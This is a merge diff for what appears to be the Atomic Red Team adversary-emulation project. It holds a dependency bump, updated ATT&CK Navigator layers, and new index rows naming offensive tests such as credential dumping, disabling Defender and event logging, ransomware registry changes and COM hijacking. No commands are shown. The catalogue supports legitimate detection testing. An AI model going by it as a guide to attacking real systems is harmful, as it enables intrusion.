Merge branch 'master' into master

Gemfile.lock

@@ -224,15 +224,15 @@ GEM
       rb-fsevent (~> 0.10, >= 0.10.3)
       rb-inotify (~> 0.9, >= 0.9.10)
     mercenary (0.3.6)
-    mini_portile2 (2.6.1)
+    mini_portile2 (2.8.0)
     minima (2.5.1)
       jekyll (>= 3.5, < 5.0)
       jekyll-feed (~> 0.9)
       jekyll-seo-tag (~> 2.1)
     minitest (5.14.4)
     multipart-post (2.1.1)
-    nokogiri (1.12.5)
-      mini_portile2 (~> 2.6.1)
+    nokogiri (1.13.3)
+      mini_portile2 (~> 2.8.0)
       racc (~> 1.4)
     octokit (4.21.0)
       faraday (>= 0.9)

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json

@@ -1 +1 @@
-{"version":"4.3","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]}
+{"version":"4.3","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json

@@ -1 +1 @@
-{"version":"4.3","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
+{"version":"4.3","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]}]}

atomics/Indexes/Indexes-CSV/index.csv

@@ -26,9 +26,11 @@ credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credential
 credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
 credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
 credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
+credential-access,T1555.003,Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
 credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
 credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
+credential-access,T1003.006,DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
 credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
@@ -68,8 +70,9 @@ credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c623714
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
 credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
 credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
-credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
-credential-access,T1003.003,NTDS,7,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
+credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
@@ -120,6 +123,7 @@ collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single F
 collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
 collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
+collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
 collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
 collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
 collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
@@ -148,6 +152,7 @@ collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe
 collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
 collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
+collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
 privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
 privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
@@ -180,6 +185,7 @@ privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
+privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
@@ -237,6 +243,7 @@ privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-3
 privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
 privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
+privilege-escalation,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
 privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -347,6 +354,7 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service
 defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
 defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.002,Disable Windows Event Logging,5,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
+defense-evasion,T1562.002,Disable Windows Event Logging,6,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
@@ -388,6 +396,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
@@ -455,13 +464,17 @@ defense-evasion,T1553.005,Mark-of-the-Web Bypass,3,Remove the Zone.Identifier al
 defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
+defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
 defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
 defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
+defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -530,6 +543,7 @@ defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
+defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
 defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
@@ -538,6 +552,9 @@ defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-39
 defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
 defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
 defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
+defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
+defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
+defense-evasion,T1218.011,Rundll32,11,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
@@ -553,6 +570,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downlo
 defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
@@ -593,6 +611,10 @@ persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
+persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
+persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
+persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
 persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
@@ -618,6 +640,7 @@ persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
+persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -679,6 +702,7 @@ persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-
 persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
 persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
+persistence,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
 persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -745,6 +769,7 @@ discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome / Opera Bookmark
 discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
 discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
 discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
+discovery,T1217,Browser Bookmark Discovery,8,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
 discovery,T1087.002,Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
 discovery,T1087.002,Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
 discovery,T1087.002,Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
@@ -830,6 +855,7 @@ discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory D
 discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
+discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
@@ -929,6 +955,7 @@ execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0
 execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
 execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
+execution,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
 execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
@@ -937,12 +964,15 @@ execution,T1053.006,Systemd Timers,2,Create a user level transient systemd servi
 execution,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
+execution,T1059.004,Unix Shell,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
+execution,T1059.004,Unix Shell,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
 execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
 execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
+execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
